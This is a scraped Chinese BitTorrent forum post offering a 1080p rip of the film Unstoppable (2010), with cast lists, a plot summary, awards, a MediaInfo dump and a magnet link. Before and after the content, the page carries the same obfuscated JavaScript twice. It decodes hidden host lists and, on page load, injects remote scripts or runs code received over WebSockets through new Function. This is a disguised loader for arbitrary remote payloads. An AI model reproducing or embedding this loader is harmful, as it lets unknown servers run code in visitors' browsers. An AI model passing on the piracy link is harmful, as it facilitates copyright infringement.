危情时速[中文字幕].Unstoppable.2010.1080p.BluRay.x265.10bit.DTS 7.59GB

版主小s 19天前 263

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 危情时速 / 煞不住(台) / 煞破天劫(港) / 不可阻挡 / 无可阻止 / Runaway Train

◎片 名 Unstoppable

◎年 代 2010

◎产 地 美国

◎类 别 动作 / 惊悚

◎语 言 英语

◎上映日期 2010-11-09(中国大陆) / 2010-11-12(美国)

◎IMDb链接 https://www.imdb.com/title/tt0477080/

◎豆瓣评分 7.8/10 (57633人评价)

◎豆瓣链接 https://movie.douban.com/subject/3011459/

◎片 长 98分钟

◎导 演 托尼·斯科特 Tony Scott (id:1017979)

◎编 剧 马克·鲍姆贝克 Mark Bomback (id:1050270)

◎演 员 丹泽尔·华盛顿 Denzel Washington (id:1054431)

克里斯·派恩 Chris Pine (id:1053621)

罗莎里奥·道森 Rosario Dawson (id:1044717)

伊桑·苏普利 Ethan Suplee (id:1017960)

凯文·杜恩 Kevin Dunn (id:1049634)

卢·坦普尔 Lew Temple (id:1149667)

梅根·坦迪 Meagan Tandy (id:1416067)

凯文·查普曼 Kevin Chapman (id:1280483)

艾莎·辛德斯 Aisha Hinds (id:1176767)

T·J·米勒 T.J. Miller (id:1248294)

迪兰·布鲁斯 Dylan Bruce (id:1045467)

伊丽莎白·马西斯 Elizabeth Mathis (id:1313156)

大卫·沃肖夫斯基 David Warshofsky (id:1032209)

洁西·斯克拉姆 Jessy Schram (id:1013941)

哈里·格雷格森-威廉姆斯 Harry Gregson-Williams (id:1056131)

本·塞雷森 Ben Seresin (id:1434113)

丹尼斯·查米恩 Denise Chamian (id:1280408)

丹妮丝·哈德森 Denise Hudson (id:1287082)

克里斯·西格斯 Chris Seagers (id:1276277)

道恩·斯维德斯基 Dawn Swiderski (id:1298734)

罗斯玛丽·勃兰登堡 Rosemary Brandenburg (id:1279191)

朱利安·阿什比 Julian Ashby (id:1277491)

佩妮·罗斯 Penny Rose (id:1296044)

Natasha Ladek Natasha Ladek (id:1289234)

内森·麦克基尼斯 Nathan McGuinness (id:1291611)

John Hart John Hart (id:1304897)

◎标 签 美国 / 动作 / 灾难 / 惊险 / 剧情 / 紧张 / 2010 / 感人

◎简 介

宾夕法尼亚州南部的布鲁斯特市,资深的火车机师弗兰克·巴恩斯(丹泽尔·华盛顿 Denzel Washington 饰)即将提前退休,作为拥有丰富阅历和经验的老员工,他和伙伴们虽然对公司出于成本雇用相对便宜却没有经验的新员工不满,却也无可奈何。这天早晨,弗兰克迎来了新的搭档,年轻气盛的领航员威尔·科尔森(克里斯·佩恩 Chris Pine 饰),新老交替正式开始。与此同时,位于北部的富勒站出现状况,满载危险化学品的777号列车在无人驾驶的情况下径自开走,如野兽般咆哮着冲向人口密集的城镇。危险随时降临,弗兰克和威尔即将度过难忘的一天……

本片根据2001年美国俄亥俄州的一个真实事件改编。

◎获奖情况 (共3项)

第83届奥斯卡金像奖 (2011)

最佳音效剪辑(提名)

└──马克·P·施特金格尔 (id:1157367)

第13届美国青少年选择奖 (2011)

最佳动作片(提名)

最佳动作片女演员(提名)

└──罗莎里奥·道森 (id:1044717)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 48665378269815178634407143899960365336 (0x249C9C65AD76858654F588197982D118)

  4. Complete name : [email protected]v

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.59 GiB

  8. Duration : 1 h 38 min

  9. Overall bit rate : 11.0 Mb/s

  10. Encoded date : UTC 2021-11-11 11:44:34

  11. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  12. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 38 min

  20. Bit rate : 9 438 kb/s

  21. Width : 1 920 pixels

  22. Height : 800 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.256

  30. Stream size : 6.49 GiB (86%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=22.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language : English

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. ID in the original source medium : 4352 (0x1100)

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 1 h 38 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossy

  51. Stream size : 1.04 GiB (14%)

  52. Language : English

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Text #1

  57. ID : 3

  58. ID in the original source medium : 4632 (0x1218)

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 1 h 34 min

  64. Bit rate : 51.8 kb/s

  65. Count of elements : 2834

  66. Stream size : 35.0 MiB (0%)

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No

  70. Original source medium : Blu-ray


  71. Text #2

  72. ID : 4

  73. ID in the original source medium : 4633 (0x1219)

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 34 min

  79. Bit rate : 52.2 kb/s

  80. Count of elements : 2834

  81. Stream size : 35.3 MiB (0%)

  82. Language : Chinese

  83. Default : No

  84. Forced : No

  85. Original source medium : Blu-ray


  86. Text #3

  87. ID : 5

  88. ID in the original source medium : 4634 (0x121A)

  89. Format : PGS

  90. Muxing mode : zlib

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 34 min

  94. Bit rate : 26.6 kb/s

  95. Count of elements : 2834

  96. Stream size : 18.0 MiB (0%)

  97. Language : Chinese

  98. Default : No

  99. Forced : No

  100. Original source medium : Blu-ray


  101. Text #4

  102. ID : 6

  103. ID in the original source medium : 4635 (0x121B)

  104. Format : PGS

  105. Muxing mode : zlib

  106. Codec ID : S_HDMV/PGS

  107. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration : 1 h 34 min

  109. Bit rate : 27.0 kb/s

  110. Count of elements : 2834

  111. Stream size : 18.2 MiB (0%)

  112. Language : Chinese

  113. Default : No

  114. Forced : No

  115. Original source medium : Blu-ray


  116. Text #5

  117. ID : 7

  118. ID in the original source medium : 4608 (0x1200)

  119. Format : PGS

  120. Muxing mode : zlib

  121. Codec ID : S_HDMV/PGS

  122. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  123. Duration : 1 h 36 min

  124. Bit rate : 45.2 kb/s

  125. Count of elements : 2758

  126. Stream size : 31.3 MiB (0%)

  127. Language : English

  128. Default : No

  129. Forced : No

  130. Original source medium : Blu-ray


  131. Menu

  132. 00:00:00.000 : en:第 01 章

  133. 00:04:45.618 : en:第 02 章

  134. 00:09:41.455 : en:第 03 章

  135. 00:14:37.668 : en:第 04 章

  136. 00:18:10.964 : en:第 05 章

  137. 00:20:58.840 : en:第 06 章

  138. 00:22:58.919 : en:第 07 章

  139. 00:25:31.363 : en:第 08 章

  140. 00:30:16.523 : en:第 09 章

  141. 00:33:58.411 : en:第 10 章

  142. 00:37:38.506 : en:第 11 章

  143. 00:39:59.105 : en:第 12 章

  144. 00:41:28.569 : en:第 13 章

  145. 00:46:36.919 : en:第 14 章

  146. 00:49:18.705 : en:第 15 章

  147. 00:52:24.933 : en:第 16 章

  148. 00:54:13.583 : en:第 17 章

  149. 00:58:44.145 : en:第 18 章

  150. 01:01:02.742 : en:第 19 章

  151. 01:03:14.290 : en:第 20 章

  152. 01:07:20.786 : en:第 21 章

  153. 01:10:00.154 : en:第 22 章

  154. 01:15:11.465 : en:第 23 章

  155. 01:18:24.533 : en:第 24 章

  156. 01:21:13.410 : en:第 25 章

  157. 01:24:53.505 : en:第 26 章

  158. 01:30:31.551 : en:第 27 章

  159. 01:32:58.864 : en:第 28 章




复制代码


TAGS 动作 惊悚

磁力链:
  • magnet:?xt=urn:btih:9B6DDE10332F8DFF7E2E20B679A32BA79B758F9A

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};